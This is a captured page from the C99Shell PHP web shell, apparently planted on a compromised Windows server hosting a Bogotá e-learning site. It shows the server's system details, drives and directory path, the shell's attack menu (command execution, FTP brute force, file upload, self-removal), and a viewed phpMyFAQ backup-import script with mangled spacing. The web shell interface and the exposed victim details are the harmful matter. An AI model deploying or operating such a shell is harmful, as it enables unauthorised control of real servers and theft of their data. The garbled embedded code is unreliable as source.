!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\aulavirtual\admin\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     backup.import.php (3.42 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* $Id: backup.import.php,v 1.7.2.12.2.5 2007/04/24 20:28:55 matteo Exp $
*
* The import function to import the phpMyFAQ backups
*
* @author       Thorsten Rinne <thorsten@rinne.info>
* @since        2003-02-24
* @copyright    (c) 2003-2007 phpMyFAQ Team
*
* The contents of this file are subject to the Mozilla Public License
* Version 1.1 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
*/

if (!defined('IS_VALID_PHPMYFAQ_ADMIN')) {
    
header('Location: http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']));
    exit();
}
if (
$permission["restore"]) {
?>
    <h2><?php print $PMF_LANG["ad_csv_rest"]; ?></h2>
<?php
    
if (isset($_FILES["userfile"]["type"]) && ($_FILES["userfile"]["type"] == "application/octet-stream" || $_FILES["userfile"]["type"] == "text/plain" || $_FILES["userfile"]["type"] == "text/x-sql")) {
        
$ok 1;
        
$fp fopen($_FILES["userfile"]["tmp_name"], "r");
        
$dat fgets($fp65536);

        if (
substr($dat09) != '-- pmf1.6') {
            print 
$PMF_LANG["ad_csv_no"];
            
$ok 0;
        } else {
            
$dat substr($dat11);
            
$tbl explode(' '$dat);
            
$num count($tbl);
            for (
$h 0$h <= $num$h++) {
                if (isset(
$tbl[$h])) {
                    
$mquery[] = 'DELETE FROM '.trim($tbl[$h]);
                }
            }
            
$ok 1;
        }

        if (
$ok == 1) {
            
$table_prefix '';
            print 
"<p>".$PMF_LANG['ad_csv_prepare']."</p>\n";
            while ((
$dat fgets($fp65536))) {
                
$dat trim($dat);
                
$backup_prefix_pattern "-- pmftableprefix:";
                
$backup_prefix_pattern_len strlen($backup_prefix_pattern);
                if (
substr($dat0$backup_prefix_pattern_len) == $backup_prefix_pattern) {
                    
$table_prefix trim(substr($dat$backup_prefix_pattern_len));
                }
                if ( (
substr($dat02) != '--') && ($dat != '') ) {
                    
$mquery[] = trim(substr($dat0, -1));
                }
            }
            
fclose($fp);

            
$k 0;
            
$g 0;
            print 
"<p>".$PMF_LANG["ad_csv_process"]."</p>\n";
            
$anz count($mquery);
            
$kg "";
            for (
$i 0$i $anz$i++) {
                
$mquery[$i] = alignTablePrefix($mquery[$i], $table_prefixSQLPREFIX);
                
$kg $db->query($mquery[$i]);
                if (!
$kg) {
                    print 
"<div style=\"font-size: 9px;\"><b>Query</b>: \"".PMF_htmlentities($mquery[$i], ENT_QUOTES$PMF_LANG['metaCharset'])."\" <span style=\"color: red;\">failed (Reason: ".$db->error().")</span></div>\n";
                    
$k++;
                } else {
                    print 
"<div style=\"font-size: 9px;\"><b>Query</b>: <!-- \"".PMF_htmlentities($mquery[$i], ENT_QUOTES$PMF_LANG['metaCharset'])."\" --> <span style=\"color: green;\">okay</span></div>\n";
                    
$g++;
                }
            }
            print 
"<p>".$g." ".$PMF_LANG["ad_csv_of"]." ".$anz." ".$PMF_LANG["ad_csv_suc"]."</p>\n";
        }
    } else {
        print 
"<p>".$PMF_LANG["ad_csv_no"]."</p>";
    }
} else {
    print 
$PMF_LANG["err_NotAuth"];
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--